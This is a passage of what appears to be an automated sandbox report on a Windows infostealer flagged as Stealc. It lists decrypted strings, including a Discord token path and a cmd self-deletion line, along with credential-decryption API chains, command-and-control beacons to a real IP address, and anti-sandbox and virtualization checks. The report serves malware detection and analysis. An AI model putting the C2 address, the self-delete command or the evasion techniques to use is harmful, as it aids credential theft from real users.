                Source: 0.2.file.exe.190000.0.unpackString decryptor: done
                Source: 0.2.file.exe.190000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.190000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.190000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.190000.0.unpackString decryptor: https
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.190000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.190000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.190000.0.unpackString decryptor: build
                Source: 0.2.file.exe.190000.0.unpackString decryptor: token
                Source: 0.2.file.exe.190000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.190000.0.unpackString decryptor: file
                Source: 0.2.file.exe.190000.0.unpackString decryptor: message
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.190000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_001A9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0019A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0019A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001972A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001972A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0019C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001A40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0019E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00191710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00191710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0019F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001A47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001A3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001A4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0019DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0019EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0019BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0019DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 30 31 38 41 37 39 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="hwid"F9C8018A799D1524750037------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build"tale------IIEBGIDAAFHIJJJJEGCG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001962D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_001962D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 30 31 38 41 37 39 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="hwid"F9C8018A799D1524750037------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build"tale------IIEBGIDAAFHIJJJJEGCG--
                Source: file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php&
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php;
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpk
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phps
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/I
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/l
                Source: file.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D00980_2_001D0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC0920_2_005EC092
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C21380_2_001C2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EB1980_2_001EB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005951F20_2_005951F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FE2580_2_001FE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D42880_2_001D4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0021B3080_2_0021B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006923FE0_2_006923FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020D39E0_2_0020D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E546F0_2_005E546F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B340E0_2_004B340E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BE5440_2_001BE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B45730_2_001B4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F45C40_2_005F45C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D45A80_2_001D45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FD5A80_2_001FD5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F95BD0_2_005F95BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020A6480_2_0020A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EF6D40_2_005EF6D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D66C80_2_001D66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002196FD0_2_002196FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001ED7200_2_001ED720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002067990_2_00206799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E48680_2_001E4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E98B80_2_001E98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EB8A80_2_001EB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FF8D60_2_001FF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F7AEE0_2_005F7AEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E8A9F0_2_005E8A9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E3A910_2_005E3A91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDB570_2_005EDB57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00541B3A0_2_00541B3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00204BA80_2_00204BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00200B880_2_00200B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F2BEB0_2_005F2BEB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001F8BD90_2_001F8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020AC280_2_0020AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FAD380_2_001FAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C1D780_2_001C1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EBD680_2_001EBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E5DB90_2_001E5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524D860_2_00524D86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E4DC80_2_001E4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D8E780_2_001D8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00201EE80_2_00201EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E6F2A0_2_005E6F2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F5FDB0_2_005F5FDB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E1FBE0_2_005E1FBE
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00194610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: jfbmubxy ZLIB complexity 0.9951572878925121
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001A9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_001A3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YX7KISKI.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2134016 > 1048576
                Source: file.exeStatic PE information: Raw size of jfbmubxy is bigger than: 0x100000 < 0x19e000
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.190000.0.unpack :EW;.rsrc :W;.idata :W; :EW;jfbmubxy:EW;qpyydaeu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;jfbmubxy:EW;qpyydaeu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001A9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2090fd should be: 0x20d196
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: jfbmubxy
                Source: file.exeStatic PE information: section name: qpyydaeu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069602F push ecx; mov dword ptr [esp], 76FDD07Ah0_2_00696054
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068A03C push eax; mov dword ptr [esp], edi0_2_0068A040
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E5039 push 744BB343h; mov dword ptr [esp], ecx0_2_006E5107
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00680033 push ebx; mov dword ptr [esp], edx0_2_0068007D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DE0D4 push 42635D07h; mov dword ptr [esp], ebx0_2_004DE11A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DE0D4 push 4CBEE7BAh; mov dword ptr [esp], ebp0_2_004DE12D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DC0DA push eax; mov dword ptr [esp], edx0_2_006DC0EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BA0DC push eax; retf 0_2_001BA0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push edi; mov dword ptr [esp], edx0_2_005EC09A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 7103705Bh; mov dword ptr [esp], ecx0_2_005EC0B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push esi; mov dword ptr [esp], 54EF60ACh0_2_005EC0BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 6CBAF79Ah; mov dword ptr [esp], esi0_2_005EC102
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 33105D20h; mov dword ptr [esp], edi0_2_005EC11B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push edi; mov dword ptr [esp], 5AB8A80Ch0_2_005EC176
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push eax; mov dword ptr [esp], 24C8BAC5h0_2_005EC1B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push eax; mov dword ptr [esp], edx0_2_005EC1C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 6CDF014Fh; mov dword ptr [esp], eax0_2_005EC229
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push eax; mov dword ptr [esp], ecx0_2_005EC26B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push ecx; mov dword ptr [esp], 0AB70FB1h0_2_005EC2E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push ebp; mov dword ptr [esp], 2FDF2066h0_2_005EC344
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push eax; mov dword ptr [esp], 00000004h0_2_005EC37D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 6E4B16CAh; mov dword ptr [esp], esp0_2_005EC398
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push esi; mov dword ptr [esp], edi0_2_005EC3C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 623BA901h; mov dword ptr [esp], ebp0_2_005EC437
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push ecx; mov dword ptr [esp], 6BCB5085h0_2_005EC43B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push ebp; mov dword ptr [esp], 4B4F38FBh0_2_005EC5AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push edx; mov dword ptr [esp], 4173A283h0_2_005EC5CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 00A08A00h; mov dword ptr [esp], esi0_2_005EC614
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 69AB1359h; mov dword ptr [esp], edx0_2_005EC639
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 19A480E9h; mov dword ptr [esp], esi0_2_005EC643
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC092 push 72DAB8BCh; mov dword ptr [esp], eax0_2_005EC6A8
                Source: file.exeStatic PE information: section name: jfbmubxy entropy: 7.954398725393829

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001A9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37768
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E3E9 second address: 47DCA1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418C0B128h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D24B1h], ebx 0x00000013 push dword ptr [ebp+122D03E5h] 0x00000019 cmc 0x0000001a call dword ptr [ebp+122D1839h] 0x00000020 pushad 0x00000021 jmp 00007FB418C0B12Ah 0x00000026 or dword ptr [ebp+122D1C94h], ecx 0x0000002c xor eax, eax 0x0000002e xor dword ptr [ebp+122D253Ah], edi 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 cmc 0x00000039 mov dword ptr [ebp+122D3956h], eax 0x0000003f mov dword ptr [ebp+122D1C94h], esi 0x00000045 mov esi, 0000003Ch 0x0000004a pushad 0x0000004b pushad 0x0000004c jmp 00007FB418C0B132h 0x00000051 movsx ecx, cx 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D1C94h], ecx 0x0000005b popad 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D2E52h], edx 0x00000066 jmp 00007FB418C0B133h 0x0000006b lodsw 0x0000006d pushad 0x0000006e push edi 0x0000006f cmc 0x00000070 pop eax 0x00000071 mov edi, 0A1F7C70h 0x00000076 popad 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b cld 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 add dword ptr [ebp+122D253Ah], eax 0x00000086 push eax 0x00000087 push eax 0x00000088 push edx 0x00000089 push esi 0x0000008a jl 00007FB418C0B126h 0x00000090 pop esi 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDBBA second address: 5FDBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDBBF second address: 5FDBC9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB418C0B132h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
